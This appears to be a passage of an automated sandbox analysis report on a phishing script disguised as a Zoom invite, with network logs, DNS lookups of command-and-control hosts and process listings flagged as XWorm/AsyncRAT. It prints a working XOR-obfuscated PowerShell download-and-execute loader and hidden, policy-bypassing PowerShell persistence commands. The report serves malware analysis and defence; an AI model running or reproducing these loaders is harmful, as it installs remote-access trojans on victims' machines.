                                          Sep 25, 2024 09:29:32.721144915 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:32.803109884 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:34.740845919 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:34.746365070 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:34.953706026 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:34.956480026 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:34.961350918 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:45.397278070 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:45.702840090 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:45.910027981 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:45.912720919 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:45.917556047 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:46.116044044 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:46.123367071 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:46.330770969 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:46.337965965 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:46.342845917 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:52.022973061 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:52.028062105 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:52.235344887 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:52.236854076 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:52.241731882 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:56.428833008 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:56.436748981 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:56.641561031 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:29:56.645080090 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:29:56.650374889 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:00.269263983 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:00.274188995 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:00.482743025 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:00.484299898 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:00.490931034 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:02.734814882 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:02.789741039 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:09.006686926 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:09.011728048 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:09.219207048 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:09.226239920 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:09.231138945 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.100352049 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:14.105246067 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.115986109 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:14.120862007 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.313512087 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.315181971 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:14.319937944 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.334603071 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:14.339508057 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.432414055 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.433950901 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:14.438824892 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.551472902 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:14.553307056 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:14.558146000 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:19.522113085 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:19.527627945 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:19.584664106 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:19.589538097 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:19.741189003 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:19.743870020 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:19.748725891 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:19.860217094 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:19.861943007 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:19.866822958 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:30.242640972 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:30.247581959 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:30.454849958 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:30.456643105 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:30.461503983 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:32.749519110 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:32.818707943 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:40.272344112 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:40.277172089 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:40.289551973 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:40.294377089 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:40.484687090 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:40.519066095 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:40.523897886 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:40.603771925 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:40.650410891 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:40.667562008 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:40.672399998 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.256938934 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.261738062 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.272203922 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.277745962 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.287705898 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.292542934 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.319108009 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.323914051 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.469254971 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.470968008 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.476217985 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.588134050 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.590089083 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.594820976 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.706649065 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.708242893 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.713068962 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:41.713109970 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:41.717859983 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:44.995153904 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:44.999958992 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:45.207305908 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:45.209150076 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:45.213951111 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:46.819129944 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:46.823950052 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:47.031208038 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:47.033200026 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:47.038026094 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:52.006505013 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:52.011441946 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:52.039026022 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:52.045236111 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:52.218974113 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:52.223079920 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:52.227919102 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:52.337501049 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:30:52.340946913 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:30:52.345796108 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.272255898 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.277209044 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.287735939 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.292902946 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.303544044 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.308444977 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.484863043 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.499099970 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.503998995 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.603545904 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.605639935 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.610500097 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.722210884 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.771872997 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.855550051 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:02.897150040 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.923532009 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:02.930146933 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:09.819418907 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:09.824532032 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:10.032641888 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:10.034025908 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:10.039802074 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:13.131627083 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:13.136576891 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:13.344305038 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:13.345894098 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:13.351174116 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:23.787662029 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:23.792718887 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:24.000320911 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:24.001981974 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:24.007455111 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:31.068964005 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:31.073869944 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:31.281085968 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:31.318662882 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:31.323550940 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:32.747080088 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:32.881371021 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:34.615910053 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:34.620774031 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:34.828778028 CEST70004971994.198.50.33192.168.2.6
                                          Sep 25, 2024 09:31:34.829608917 CEST497197000192.168.2.694.198.50.33
                                          Sep 25, 2024 09:31:34.834395885 CEST70004971994.198.50.33192.168.2.6
                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 25, 2024 09:27:27.338643074 CEST6034653192.168.2.61.1.1.1
                                          Sep 25, 2024 09:27:27.345980883 CEST53603461.1.1.1192.168.2.6
                                          Sep 25, 2024 09:27:34.901611090 CEST6138053192.168.2.61.1.1.1
                                          Sep 25, 2024 09:27:34.908704996 CEST53613801.1.1.1192.168.2.6
                                          Sep 25, 2024 09:27:35.622723103 CEST6080353192.168.2.61.1.1.1
                                          Sep 25, 2024 09:27:35.629847050 CEST53608031.1.1.1192.168.2.6
                                          Sep 25, 2024 09:27:52.193001986 CEST5904853192.168.2.61.1.1.1
                                          Sep 25, 2024 09:27:52.316044092 CEST53590481.1.1.1192.168.2.6
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 25, 2024 09:27:27.338643074 CEST192.168.2.61.1.1.10xc7d0Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:34.901611090 CEST192.168.2.61.1.1.10x7c52Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:35.622723103 CEST192.168.2.61.1.1.10xd026Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:52.193001986 CEST192.168.2.61.1.1.10x1d3cStandard query (0)ALBANIAH3CKER.WORK.GDA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 25, 2024 09:27:27.345980883 CEST1.1.1.1192.168.2.60xc7d0No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:27.345980883 CEST1.1.1.1192.168.2.60xc7d0No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:34.908704996 CEST1.1.1.1192.168.2.60x7c52No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:34.908704996 CEST1.1.1.1192.168.2.60x7c52No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:34.908704996 CEST1.1.1.1192.168.2.60x7c52No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:35.629847050 CEST1.1.1.1192.168.2.60xd026No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:52.316044092 CEST1.1.1.1192.168.2.60x1d3cNo error (0)ALBANIAH3CKER.WORK.GD94.198.50.33A (IP address)IN (0x0001)false

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:03:27:24
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf"
                                          Imagebase:0x7ff6c9d90000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:03:27:25
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO"
                                          Imagebase:
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:
                                          Has administrator privileges:
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:3
                                          Start time:03:27:25
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:27:35
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
                                          Imagebase:0x7ff6c9d90000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
                                          Imagebase:0x7ff6294e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff6294e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:03:27:48
                                          Start date:25/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x730000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Target ID:13
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
                                          Imagebase:0x7ff6c9d90000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:14
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
                                          Imagebase:0x7ff6294e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:15
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff6294e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:03:28:35
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:03:28:46
                                          Start date:25/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x790000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:13.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:54
                                            Total number of Limit Nodes:5
                                            execution_graph 11538 10618e0 11539 10618e4 11538->11539 11542 1061a61 11539->11542 11548 1061b78 11539->11548 11544 1061a9c 11542->11544 11543 1061ba1 11543->11539 11544->11543 11554 1061fbd 11544->11554 11560 1062018 11544->11560 11565 106200a 11544->11565 11549 1061b4f 11548->11549 11550 1061ba1 11549->11550 11551 1061fbd GlobalMemoryStatusEx 11549->11551 11552 106200a GlobalMemoryStatusEx 11549->11552 11553 1062018 GlobalMemoryStatusEx 11549->11553 11550->11539 11551->11549 11552->11549 11553->11549 11555 1061f7d 11554->11555 11556 1061fa1 11554->11556 11556->11554 11570 1062a63 11556->11570 11575 1062be0 11556->11575 11557 106211e 11557->11557 11561 106203d 11560->11561 11563 1062a63 GlobalMemoryStatusEx 11561->11563 11564 1062be0 GlobalMemoryStatusEx 11561->11564 11562 106211e 11562->11562 11563->11562 11564->11562 11566 106203d 11565->11566 11568 1062a63 GlobalMemoryStatusEx 11566->11568 11569 1062be0 GlobalMemoryStatusEx 11566->11569 11567 106211e 11567->11567 11568->11567 11569->11567 11571 1062a66 11570->11571 11580 1067b08 11571->11580 11584 1067b18 11571->11584 11572 1062f02 11572->11557 11576 1062be5 11575->11576 11578 1067b08 GlobalMemoryStatusEx 11576->11578 11579 1067b18 GlobalMemoryStatusEx 11576->11579 11577 1062f02 11577->11557 11578->11577 11579->11577 11581 1067b3d 11580->11581 11588 1067da2 11581->11588 11582 1067b9f 11582->11572 11585 1067b3d 11584->11585 11587 1067da2 GlobalMemoryStatusEx 11585->11587 11586 1067b9f 11586->11572 11587->11586 11589 1067db4 11588->11589 11593 1067dd8 11589->11593 11598 1067de8 11589->11598 11590 1067dbe 11590->11582 11594 1067dec 11593->11594 11595 1067df5 11594->11595 11603 1067784 11594->11603 11595->11590 11599 1067df5 11598->11599 11600 1067e1d 11598->11600 11599->11590 11601 1067784 GlobalMemoryStatusEx 11600->11601 11602 1067e3a 11601->11602 11602->11590 11604 1067ec0 GlobalMemoryStatusEx 11603->11604 11606 1067e3a 11604->11606 11606->11590

                                            Control-flow Graph

                                            • Executed
